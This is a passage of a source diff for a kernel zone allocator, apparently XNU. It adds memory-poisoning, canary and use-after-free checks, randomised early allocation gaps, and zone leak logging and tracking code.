unsigned int len; + const char *zc = zonename; + const char *lc = logname; + + /* + * Compare the strings. We bound the compare by MAX_ZONE_NAME. + */ + + for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) { + /* + * If the current characters don't match, check for a space in + * in the zone name and a corresponding period in the log name. + * If that's not there, then the strings don't match. + */ + + if (*zc != *lc && !(*zc == ' ' && *lc == '.')) { + break; + } + + /* + * The strings are equal so far. If we're at the end, then it's a match. + */ + + if (*zc == '\0') { + return TRUE; + } + } + + return FALSE; +} + +#if DEBUG || DEVELOPMENT + +vm_size_t +zone_element_info(void *addr, vm_tag_t * ptag) +{ + vm_size_t size = 0; + vm_tag_t tag = VM_KERN_MEMORY_NONE; + struct zone *src_zone; + + if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) || + from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) { + src_zone = &zone_array[zone_index_from_ptr(addr)]; +#if VM_MAX_TAG_ZONES + if (__improbable(src_zone->tags)) { + tag = *ztSlot(src_zone, (vm_offset_t)addr) >> 1; + } +#endif /* VM_MAX_TAG_ZONES */ + size = zone_elem_size(src_zone); + } else { +#if CONFIG_GZALLOC + gzalloc_element_size(addr, NULL, &size); +#endif /* CONFIG_GZALLOC */ + } + *ptag = tag; + return size; +} + +#endif /* DEBUG || DEVELOPMENT */ + +/* The backup pointer is stored in the last pointer-sized location in an element. 
*/ +__header_always_inline vm_offset_t * +get_primary_ptr(vm_offset_t elem) +{ + return (vm_offset_t *)elem; +} + +__header_always_inline vm_offset_t * +get_backup_ptr(vm_offset_t elem, vm_size_t elem_size) +{ + return (vm_offset_t *)(elem + elem_size - sizeof(vm_offset_t)); +} + +#endif /* !ZALLOC_TEST */ +#pragma mark Zone poisoning/zeroing and early random +#if !ZALLOC_TEST + +#define ZONE_ENTROPY_CNT 2 +static struct zone_bool_gen { + struct bool_gen zbg_bg; + uint32_t zbg_entropy[ZONE_ENTROPY_CNT]; +} zone_bool_gen[MAX_CPUS]; + +/* + * Initialize zone poisoning + * called from zone_bootstrap before any allocations are made from zalloc + */ +__startup_func +static void +zp_bootstrap(void) +{ + char temp_buf[16]; + + /* + * Initialize canary random cookie. + * + * Make sure that (zp_canary ^ pointer) have non zero low bits (01) + * different from ZONE_POISON (11). + * + * On LP64, have (zp_canary ^ pointer) have the high bits equal 0xC0FFEE... + */ + static_assert(ZONE_POISON % 4 == 3); + zp_canary = (uintptr_t)early_random(); +#if __LP64__ + zp_canary &= 0x000000fffffffffc; + zp_canary |= 0xc0ffee0000000001 ^ 0xffffff0000000000; +#else + zp_canary &= 0xfffffffc; + zp_canary |= 0x00000001; +#endif + + /* -zp: enable poisoning for every alloc and free */ + if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) { + zp_factor = 1; + } + + /* -no-zp: disable poisoning */ + if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) { + zp_factor = 0; + printf("Zone poisoning disabled\n"); + } + + zpercpu_foreach_cpu(cpu) { + random_bool_init(&zone_bool_gen[cpu].zbg_bg); + } +} + +static inline uint32_t +zone_poison_count_init(zone_t zone) +{ + return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^ + (mach_absolute_time() & 0x7); +} + +/* + * Zero the element if zone has z_free_zeroes flag set else poison + * the element if zs_poison_seqno hits 0. 
+ */ +static zprot_mode_t +zfree_clear_or_poison(zone_t zone, vm_offset_t addr, vm_offset_t elem_size) +{ + if (zone->z_free_zeroes) { + if (zone->z_percpu) { + zpercpu_foreach_cpu(i) { + bzero((void *)(addr + ptoa(i)), elem_size); + } + } else { + bzero((void *)addr, elem_size); + } + return ZPM_ZERO; + } + + zprot_mode_t poison = ZPM_AUTO; +#if ZALLOC_ENABLE_POISONING + if (__improbable(zp_factor == 1)) { + poison = ZPM_POISON; + } else if (__probable(zp_factor != 0)) { + uint32_t *seqnop = &zpercpu_get(zone->z_stats)->zs_poison_seqno; + uint32_t seqno = os_atomic_load(seqnop, relaxed); + if (seqno == 0) { + os_atomic_store(seqnop, zone_poison_count_init(zone), relaxed); + poison = ZPM_POISON; + } else { + os_atomic_store(seqnop, seqno - 1, relaxed); + } + } + if (poison == ZPM_POISON) { + /* memset_pattern{4|8} could help make this faster: */ + for (size_t i = 0; i < elem_size / sizeof(vm_offset_t); i++) { + ((vm_offset_t *)addr)[i] = ZONE_POISON; + } + } else { + /* + * Set a canary at the extremities. + * + * Zero first zp_min_size bytes of elements that aren't being + * poisoned. + * + * Element size is larger than zp_min_size in this path, + * zones with smaller elements have z_free_zeroes set. 
+ */ + *get_primary_ptr(addr) = zp_canary ^ (uintptr_t)addr; + bzero((void *)addr + sizeof(vm_offset_t), + zp_min_size - sizeof(vm_offset_t)); + *get_backup_ptr(addr, elem_size) = zp_canary ^ (uintptr_t)addr; + + poison = ZPM_CANARY; + } +#endif /* ZALLOC_ENABLE_POISONING */ + + return poison; +} + +#if ZALLOC_ENABLE_POISONING + +__abortlike +static void +zalloc_uaf_panic(zone_t z, uintptr_t elem, size_t size, zprot_mode_t zpm) +{ + uint32_t esize = (uint32_t)zone_elem_size(z); + uint32_t first_offs = ~0u; + uintptr_t first_bits = 0, v; + char buf[1024]; + int pos = 0; + const char *how; + +#if __LP64__ +#define ZPF "0x%016lx" +#else +#define ZPF "0x%08lx" +#endif + + buf[0] = '\0'; + + if (zpm == ZPM_CANARY) { + how = "canaries"; + + v = *get_primary_ptr(elem); + if (v != (elem ^ zp_canary)) { + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: got "ZPF", want "ZPF" (xor: "ZPF")", + 0, v, (elem ^ zp_canary), (v ^ elem ^ zp_canary)); + if (first_offs > 0) { + first_offs = 0; + first_bits = v; + } + } + + v = *get_backup_ptr(elem, esize); + if (v != (elem ^ zp_canary)) { + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: got "ZPF", want "ZPF" (xor: "ZPF")", + esize - (int)sizeof(v), v, (elem ^ zp_canary), + (v ^ elem ^ zp_canary)); + if (first_offs > esize - sizeof(v)) { + first_offs = esize - sizeof(v); + first_bits = v; + } + } + + for (uint32_t o = sizeof(v); o < zp_min_size; o += sizeof(v)) { + if ((v = *(uintptr_t *)(elem + o)) == 0) { + continue; + } + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: "ZPF, o, v); + if (first_offs > o) { + first_offs = o; + first_bits = v; + } + } + } else if (zpm == ZPM_ZERO) { + how = "zero"; + + for (uint32_t o = 0; o < size; o += sizeof(v)) { + if ((v = *(uintptr_t *)(elem + o)) == 0) { + continue; + } + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: "ZPF, o, v); + if (first_offs > o) { + first_offs = o; + first_bits = v; + } + } + } else { + how = "poison"; + + for (uint32_t o = 
0; o < size; o += sizeof(v)) { + if ((v = *(uintptr_t *)(elem + o)) == ZONE_POISON) { + continue; + } + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: "ZPF" (xor: "ZPF")", + o, v, (v ^ ZONE_POISON)); + if (first_offs > o) { + first_offs = o; + first_bits = v; + } + } + } + + (panic)("[%s%s]: element modified after free " + "(off:%d, val:"ZPF", sz:%d, ptr:%p, prot:%s)%s", + zone_heap_name(z), zone_name(z), + first_offs, first_bits, esize, (void *)elem, how, buf); + +#undef ZPF +} + +static void +zalloc_validate_element_zero(zone_t zone, vm_offset_t elem, vm_size_t size) +{ + if (memcmp_zero_ptr_aligned((void *)elem, size)) { + zalloc_uaf_panic(zone, elem, size, ZPM_ZERO); + } + if (!zone->z_percpu) { + return; + } + for (size_t i = zpercpu_count(); --i > 0;) { + elem += PAGE_SIZE; + if (memcmp_zero_ptr_aligned((void *)elem, size)) { + zalloc_uaf_panic(zone, elem, size, ZPM_ZERO); + } + } +} + +#if __arm64__ || __arm__ +typedef __attribute__((ext_vector_type(2))) vm_offset_t zpair_t; +#else +typedef struct { + vm_offset_t x; + vm_offset_t y; +} zpair_t; +#endif + + +__attribute__((noinline)) +static void +zalloc_validate_element_poison(zone_t zone, vm_offset_t elem, vm_size_t size) +{ + vm_offset_t p = elem; + vm_offset_t end = elem + size; + + const zpair_t poison = { ZONE_POISON, ZONE_POISON }; + zpair_t a, b; + + a.x = *(const vm_offset_t *)p; + a.y = *(const vm_offset_t *)(end - sizeof(vm_offset_t)); + + a.x ^= poison.x; + a.y ^= poison.y; + + /* + * align p to the next double-wide boundary + * align end to the previous double-wide boundary + */ + p = (p + sizeof(zpair_t) - 1) & -sizeof(zpair_t); + end &= -sizeof(zpair_t); + + if ((end - p) % (2 * sizeof(zpair_t)) == 0) { /* loop below covers the whole span two pairs at a time: both lanes of b must start at zero */ + b.x = 0; + b.y = 0; + } else { + end -= sizeof(zpair_t); + b.x = ((zpair_t *)end)[0].x ^ poison.x; + b.y = ((zpair_t *)end)[0].y ^ poison.y; + } + + for (; p < end; p += 2 * sizeof(zpair_t)) { + a.x |= ((zpair_t *)p)[0].x ^ poison.x; + a.y |= ((zpair_t *)p)[0].y ^ poison.y; + b.x 
|= ((zpair_t *)p)[1].x ^ poison.x; + b.y |= ((zpair_t *)p)[1].y ^ poison.y; + } + + a.x |= b.x; + a.y |= b.y; + + if (a.x || a.y) { + zalloc_uaf_panic(zone, elem, size, ZPM_POISON); + } +} + +static void +zalloc_validate_element(zone_t zone, vm_offset_t elem, vm_size_t size, + zprot_mode_t zpm) +{ + vm_offset_t *primary = get_primary_ptr(elem); + vm_offset_t *backup = get_backup_ptr(elem, size); + +#if CONFIG_GZALLOC + if (zone->gzalloc_tracked) { + return; + } +#endif /* CONFIG_GZALLOC */ + + if (zone->z_free_zeroes) { + return zalloc_validate_element_zero(zone, elem, size); + } + + switch (zpm) { + case ZPM_AUTO: + if (*backup == 0) { + size -= sizeof(vm_size_t); + return zalloc_validate_element_zero(zone, elem, size); + } + if (*backup == ZONE_POISON) { + size -= sizeof(vm_size_t); + return zalloc_validate_element_poison(zone, elem, size); + } + OS_FALLTHROUGH; + + case ZPM_CANARY: + if ((*primary ^ zp_canary) != elem || (*backup ^ zp_canary) != elem) { + zalloc_uaf_panic(zone, elem, size, ZPM_CANARY); + } + *primary = *backup = 0; + size = zp_min_size; + OS_FALLTHROUGH; + + case ZPM_ZERO: + return zalloc_validate_element_zero(zone, elem, size); + + case ZPM_POISON: + return zalloc_validate_element_poison(zone, elem, size); + } +} + +#endif /* ZALLOC_ENABLE_POISONING */ +#if ZALLOC_EARLY_GAPS + +__attribute__((noinline)) +static void +zone_early_gap_drop(int n) +{ + while (n-- > 0) { + zone_t zone0 = &zone_array[0]; + struct zone_page_metadata *meta = NULL; + vm_offset_t addr; + uint16_t pages; + vm_map_t map; + + lck_mtx_lock(&zone_metadata_region_lck); + + if (!zone_pva_is_null(zone0->z_pageq_va)) { + meta = zone_meta_queue_pop_native(zone0, + &zone0->z_pageq_va, &addr); + map = zone_submaps[meta->zm_chunk_len]; + pages = meta->zm_alloc_size; + __builtin_bzero(meta, sizeof(struct zone_page_metadata)); + } + + lck_mtx_unlock(&zone_metadata_region_lck); + + if (!meta) { + break; + } + + kmem_free(map, addr, ptoa(pages)); + } +} + +static void 
+zone_early_gap_add(zone_t z, uint16_t pages) +{ + struct zone_page_metadata *meta = NULL; + zone_t zone0 = &zone_array[0]; + kern_return_t kr; + vm_offset_t addr; + + kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO | KMA_VAONLY; + if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL && + z->kalloc_heap != KHEAP_ID_NONE) { + kmaflags |= KMA_KHEAP; + } + + kr = kernel_memory_allocate(zone_submap(z), &addr, ptoa(pages), 0, + kmaflags, VM_KERN_MEMORY_ZONE); + + if (kr != KERN_SUCCESS) { + panic("unable to allocate early gap (%d pages): %d", pages, kr); + } + + zone_meta_populate(addr, ptoa(pages)); + + meta = zone_meta_from_addr(addr); + meta->zm_alloc_size = pages; + meta->zm_chunk_len = z->z_submap_idx; + + lck_mtx_lock(&zone_metadata_region_lck); + zone_meta_queue_push(zone0, &zone0->z_pageq_va, meta); + lck_mtx_unlock(&zone_metadata_region_lck); +} + +/* + * Roughly until pd1 is made, introduce random gaps + * between allocated pages. + * + * This way the early boot allocations are not in a completely + * predictable order and relative position. + * + * Those gaps are returned to the maps afterwards. + * + * We abuse the zone 0 (which is unused) "va" pageq to remember + * those ranges. + */ +__attribute__((noinline)) +static void +zone_allocate_random_early_gap(zone_t z) +{ + int16_t pages = early_random() % 16; + + /* + * 6% of the time: drop 2 gaps + * 25% of the time: drop 1 gap + * 37% of the time: do nothing + * 18% of the time: add 1 gap + * 12% of the time: add 2 gaps + */ + if (pages > 10) { + zone_early_gap_drop(pages == 15 ? 
2 : 1); + } + if (pages < 5) { + /* values are 6 through 16 */ + zone_early_gap_add(z, 6 + 2 * pages); + } + if (pages < 2) { + zone_early_gap_add(z, 6 + early_random() % 16); + } +} + +static inline void +zone_cleanup_early_gaps_if_needed(void) +{ + if (__improbable(!zone_pva_is_null(zone_array[0].z_pageq_va))) { + zone_early_gap_drop(10); + } +} + +#endif /* ZALLOC_EARLY_GAPS */ + +static void +zone_early_scramble_rr(zone_t zone, zone_stats_t zstats) +{ + int cpu = cpu_number(); + zone_stats_t zs = zpercpu_get_cpu(zstats, cpu); + uint32_t bits; + + bits = random_bool_gen_bits(&zone_bool_gen[cpu].zbg_bg, + zone_bool_gen[cpu].zbg_entropy, ZONE_ENTROPY_CNT, 8); + + zs->zs_alloc_rr += bits; + zs->zs_alloc_rr %= zone->z_chunk_elems; +} + +#endif /* !ZALLOC_TEST */ +#pragma mark Zone Leak Detection +#if !ZALLOC_TEST + +/* + * Zone leak debugging code + * + * When enabled, this code keeps a log to track allocations to a particular zone that have not + * yet been freed. Examining this log will reveal the source of a zone leak. The log is allocated + * only when logging is enabled, so there is no effect on the system when it's turned off. Logging is + * off by default. + * + * Enable the logging via the boot-args. Add the parameter "zlog=" to boot-args where + * is the name of the zone you wish to log. + * + * This code only tracks one zone, so you need to identify which one is leaking first. + * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone + * garbage collector. Note that the zone name printed in the panic message is not necessarily the one + * containing the leak. So do a zprint from gdb and locate the zone with the bloated size. This + * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test. The + * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs. + * See the help in the kgmacros for usage info. 
+ * + * + * Zone corruption logging + * + * Logging can also be used to help identify the source of a zone corruption. First, identify the zone + * that is being corrupted, then add "-zc zlog=" to the boot-args. When -zc is used in conjunction + * with zlog, it changes the logging style to track both allocations and frees to the zone. So when the + * corruption is detected, examining the log will show you the stack traces of the callers who last allocated + * and freed any particular element in the zone. Use the findelem kgmacro with the address of the element that's been + * corrupted to examine its history. This should lead to the source of the corruption. + */ + +/* Returns TRUE if we rolled over the counter at factor */ +__header_always_inline bool +sample_counter(volatile uint32_t *count_p, uint32_t factor) +{ + uint32_t old_count, new_count = 0; + if (count_p != NULL) { + os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, { + new_count = old_count + 1; + if (new_count >= factor) { + new_count = 0; + } + }); + } + + return new_count == 0; +} + +#if ZONE_ENABLE_LOGGING +/* Log allocations and frees to help debug a zone element corruption */ +static TUNABLE(bool, corruption_debug_flag, "-zc", false); + +#define MAX_NUM_ZONES_ALLOWED_LOGGING 10 /* Maximum 10 zones can be logged at once */ + +static int max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING; +static int num_zones_logged = 0; + +/* + * The number of records in the log is configurable via the zrecs parameter in boot-args. Set this to + * the number of records you want in the log. For example, "zrecs=10" sets it to 10 records. Since this + * is the number of stacks suspected of leaking, we don't need many records. 
+ */ + +#if defined(__LP64__) +#define ZRECORDS_MAX 2560 /* Max records allowed in the log */ +#else +#define ZRECORDS_MAX 1536 /* Max records allowed in the log */ +#endif +#define ZRECORDS_DEFAULT 1024 /* default records in log if zrecs is not specified in boot-args */ + +static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT); + +static void +zone_enable_logging(zone_t z) +{ + z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH, + (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */); + + if (z->zlog_btlog) { + printf("zone: logging started for zone %s%s\n", + zone_heap_name(z), z->z_name); + } else { + printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n"); + z->zone_logging = false; + } +} + +/** + * @function zone_setup_logging + * + * @abstract + * Optionally sets up a zone for logging. + * + * @discussion + * We recognize two boot-args: + * + * zlog=<zone name to log> + * zrecs=<number of records in the log> + * + * The zlog arg is used to specify the zone name that should be logged, + * and zrecs is used to control the size of the log. + * + * If zrecs is not specified, a default value is used. + */ +static void +zone_setup_logging(zone_t z) +{ + char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */ + char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */ + char zlog_val[MAX_ZONE_NAME]; /* the zone name we're logging, if any */ + + /* + * Don't allow more than ZRECORDS_MAX records even if the user asked for more. + * + * This prevents accidentally hogging too much kernel memory + * and making the system unusable. + */ + if (log_records > ZRECORDS_MAX) { + log_records = ZRECORDS_MAX; + } + + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name); + + /* zlog0 isn't allowed. 
*/ + for (int i = 1; i <= max_num_zones_to_log; i++) { + snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i); + + if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) && + track_this_zone(zone_name, zlog_val)) { + z->zone_logging = true; + num_zones_logged++; + break; + } + } + + /* + * Backwards compat. with the old boot-arg used to specify single zone + * logging i.e. zlog Needs to happen after the newer zlogn checks + * because the prefix will match all the zlogn + * boot-args. + */ + if (!z->zone_logging && + PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) && + track_this_zone(zone_name, zlog_val)) { + z->zone_logging = true; + num_zones_logged++; + } + + + /* + * If we want to log a zone, see if we need to allocate buffer space for + * the log. + * + * Some vm related zones are zinit'ed before we can do a kmem_alloc, so + * we have to defer allocation in that case. + * + * zone_init() will finish the job. + * + * If we want to log one of the VM related zones that's set up early on, + * we will skip allocation of the log until zinit is called again later + * on some other zone. + */ + if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) { + zone_enable_logging(z); + } +} + +/* + * Each record in the log contains a pointer to the zone element it refers to, + * and a small array to hold the pc's from the stack trace. A + * record is added to the log each time a zalloc() is done in the zone_of_interest. For leak debugging, + * the record is cleared when a zfree() is done. For corruption debugging, the log tracks both allocs and frees. + * If the log fills, old records are replaced as if it were a circular buffer. + */ + + +/* + * Decide if we want to log this zone by doing a string compare between a zone name and the name + * of the zone to log. Return true if the strings are equal, false otherwise. 
Because it's not + * possible to include spaces in strings passed in via the boot-args, a period in the logname will + * match a space in the zone name. + */ + +/* + * Test if we want to log this zalloc/zfree event. We log if this is the zone we're interested in and + * the buffer for the records has been allocated. + */ + +#define DO_LOGGING(z) (z->zlog_btlog != NULL) +#else /* !ZONE_ENABLE_LOGGING */ +#define DO_LOGGING(z) 0 +#endif /* !ZONE_ENABLE_LOGGING */ +#if CONFIG_ZLEAKS + +/* + * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding + * allocations made by the zone allocator. Every zleak_sample_factor allocations in each zone, we capture a + * backtrace. Every free, we examine the table and determine if the allocation was being tracked, + * and stop tracking it if it was being tracked. + * + * We track the allocations in the zallocations hash table, which stores the address that was returned from + * the zone allocator. Each stored entry in the zallocations table points to an entry in the ztraces table, which + * stores the backtrace associated with that allocation. This provides uniquing for the relatively large + * backtraces - we don't store them more than once. + * + * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up + * a large amount of virtual space. + */ +#define ZLEAK_STATE_ENABLED 0x01 /* Zone leak monitoring should be turned on if zone_map fills up. */ +#define ZLEAK_STATE_ACTIVE 0x02 /* We are actively collecting traces. */ +#define ZLEAK_STATE_ACTIVATING 0x04 /* Some thread is doing setup; others should move along. */ +#define ZLEAK_STATE_FAILED 0x08 /* Attempt to allocate tables failed. We will not try again. 
*/ +static uint32_t zleak_state = 0; /* State of collection, as above */ +static unsigned int zleak_sample_factor = 1000; /* Allocations per sample attempt */ + +bool panic_include_ztrace = FALSE; /* Enable zleak logging on panic */ +vm_size_t zleak_global_tracking_threshold; /* Size of zone map at which to start collecting data */ +vm_size_t zleak_per_zone_tracking_threshold; /* Size a zone will have before we will collect data on it */ + +/* + * Counters for allocation statistics. + */ + +/* Times two active records want to occupy the same spot */ +static unsigned int z_alloc_collisions = 0; +static unsigned int z_trace_collisions = 0; + +/* Times a new record lands on a spot previously occupied by a freed allocation */ +static unsigned int z_alloc_overwrites = 0; +static unsigned int z_trace_overwrites = 0; + +/* Times a new alloc or trace is put into the hash table */ +static unsigned int z_alloc_recorded = 0; +static unsigned int z_trace_recorded = 0; + +/* Times zleak_log returned false due to not being able to acquire the lock */ +static unsigned int z_total_conflicts = 0; + +/* + * Structure for keeping track of an allocation + * An allocation bucket is in use if its element is not NULL + */ +struct zallocation { + uintptr_t za_element; /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */ + vm_size_t za_size; /* how much memory did this allocation take up? 
*/ + uint32_t za_trace_index; /* index into ztraces for backtrace associated with allocation */ + /* TODO: #if this out */ + uint32_t za_hit_count; /* for determining effectiveness of hash function */ +}; + +/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */ +static uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM; +static uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM; + +vm_size_t zleak_max_zonemap_size; + +/* Hashmaps of allocations and their corresponding traces */ +static struct zallocation* zallocations; +static struct ztrace* ztraces; + +/* not static so that panic can see this, see kern/debug.c */ +struct ztrace* top_ztrace; + +/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */ +static LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock"); +static LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp); + +/* + * Initializes the zone leak monitor. Called from zone_init() + */ +__startup_func +static void +zleak_init(vm_size_t max_zonemap_size) +{ + char scratch_buf[16]; + boolean_t zleak_enable_flag = FALSE; + + zleak_max_zonemap_size = max_zonemap_size; + zleak_global_tracking_threshold = max_zonemap_size / 2; + zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8; + +#if CONFIG_EMBEDDED + if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) { + zleak_enable_flag = TRUE; + printf("zone leak detection enabled\n"); + } else { + zleak_enable_flag = FALSE; + printf("zone leak detection disabled\n"); + } +#else /* CONFIG_EMBEDDED */ + /* -zleakoff (flag to disable zone leak monitor) */ + if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) { + zleak_enable_flag = FALSE; + printf("zone leak detection disabled\n"); + } else { + zleak_enable_flag = TRUE; + printf("zone leak detection enabled\n"); + } +#endif /* CONFIG_EMBEDDED */ + + /* zfactor=XXXX (override how often to sample the zone allocator) */ + if 
(PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) { + printf("Zone leak factor override: %u\n", zleak_sample_factor); + } + + /* zleak-allocs=XXXX (override number of buckets in zallocations) */ + if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) { + printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets); + /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ + if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) { + printf("Override isn't a power of two, bad things might happen!\n"); + } + } + + /* zleak-traces=XXXX (override number of buckets in ztraces) */ + if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) { + printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets); + /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */ + if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) { + printf("Override isn't a power of two, bad things might happen!\n"); + } + } + + if (zleak_enable_flag) { + zleak_state = ZLEAK_STATE_ENABLED; + } +} + +/* + * Support for kern.zleak.active sysctl - a simplified + * version of the zleak_state variable. 
+ */ +int +get_zleak_state(void) +{ + if (zleak_state & ZLEAK_STATE_FAILED) { + return -1; + } + if (zleak_state & ZLEAK_STATE_ACTIVE) { + return 1; + } + return 0; +} + +kern_return_t +zleak_activate(void) +{ + kern_return_t retval; + vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation); + vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace); + void *allocations_ptr = NULL; + void *traces_ptr = NULL; + + /* Only one thread attempts to activate at a time */ + if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { + return KERN_SUCCESS; + } + + /* Indicate that we're doing the setup */ + lck_spin_lock(&zleak_lock); + if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) { + lck_spin_unlock(&zleak_lock); + return KERN_SUCCESS; + } + + zleak_state |= ZLEAK_STATE_ACTIVATING; + lck_spin_unlock(&zleak_lock); + + /* Allocate and zero tables */ + retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_DIAG); + if (retval != KERN_SUCCESS) { + goto fail; + } + + retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_DIAG); + if (retval != KERN_SUCCESS) { + goto fail; + } + + bzero(allocations_ptr, z_alloc_size); + bzero(traces_ptr, z_trace_size); + + /* Everything's set. Install tables, mark active. */ + zallocations = allocations_ptr; + ztraces = traces_ptr; + + /* + * Initialize the top_ztrace to the first entry in ztraces, + * so we don't have to check for null in zleak_log + */ + top_ztrace = &ztraces[0]; + + /* + * Note that we do need a barrier between installing + * the tables and setting the active flag, because the zfree() + * path accesses the table without a lock if we're active. 
+ */ + lck_spin_lock(&zleak_lock); + zleak_state |= ZLEAK_STATE_ACTIVE; + zleak_state &= ~ZLEAK_STATE_ACTIVATING; + lck_spin_unlock(&zleak_lock); + + return 0; + +fail: + /* + * If we fail to allocate memory, don't further tax + * the system by trying again. + */ + lck_spin_lock(&zleak_lock); + zleak_state |= ZLEAK_STATE_FAILED; + zleak_state &= ~ZLEAK_STATE_ACTIVATING; + lck_spin_unlock(&zleak_lock); + + if (allocations_ptr != NULL) { + kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size); + } + + if (traces_ptr != NULL) { + kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size); + } + + return retval; +} + +static inline void +zleak_activate_if_needed(void) +{ + if (__probable((zleak_state & ZLEAK_STATE_ENABLED) == 0)) { + return; + } + if (zleak_state & ZLEAK_STATE_ACTIVE) { + return; + } + if (zone_submaps_approx_size() < zleak_global_tracking_threshold) { + return; + } + + kern_return_t kr = zleak_activate(); + if (kr != KERN_SUCCESS) { + printf("Failed to activate live zone leak debugging (%d).\n", kr); + } +} + +static inline void +zleak_track_if_needed(zone_t z) +{ + if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) { + if (!z->zleak_on && + zone_size_wired(z) >= zleak_per_zone_tracking_threshold) { + z->zleak_on = true; + } + } +} + +/* + * TODO: What about allocations that never get deallocated, + * especially ones with unique backtraces? Should we wait to record + * until after boot has completed? + * (How many persistent zallocs are there?) + */ + /* - * Clear out the old next pointer and backup to avoid leaking the zone - * poisoning cookie and so that only values on the freelist have a valid - * cookie. 
+ * This function records the allocation in the allocations table, + * and stores the associated backtrace in the traces table + * (or just increments the refcount if the trace is already recorded) + * If the allocation slot is in use, the old allocation is replaced with the new allocation, and + * the associated trace's refcount is decremented. + * If the trace slot is in use, it returns. + * The refcount is incremented by the amount of memory the allocation consumes. + * The return value indicates whether to try again next time. */ -void -zone_clear_freelist_pointers(zone_t zone, vm_offset_t addr) +static boolean_t +zleak_log(uintptr_t* bt, + uintptr_t addr, + uint32_t depth, + vm_size_t allocation_size) +{ + /* Quit if there's someone else modifying the hash tables */ + if (!lck_spin_try_lock(&zleak_lock)) { + z_total_conflicts++; + return FALSE; + } + + struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; + + uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets); + struct ztrace* trace = &ztraces[trace_index]; + + allocation->za_hit_count++; + trace->zt_hit_count++; + + /* + * If the allocation bucket we want to be in is occupied, and if the occupier + * has the same trace as us, just bail. + */ + if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) { + z_alloc_collisions++; + + lck_spin_unlock(&zleak_lock); + return TRUE; + } + + /* STEP 1: Store the backtrace in the traces array. */ + /* A size of zero indicates that the trace bucket is free. */ + + if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) { + /* + * Different unique trace with same hash! 
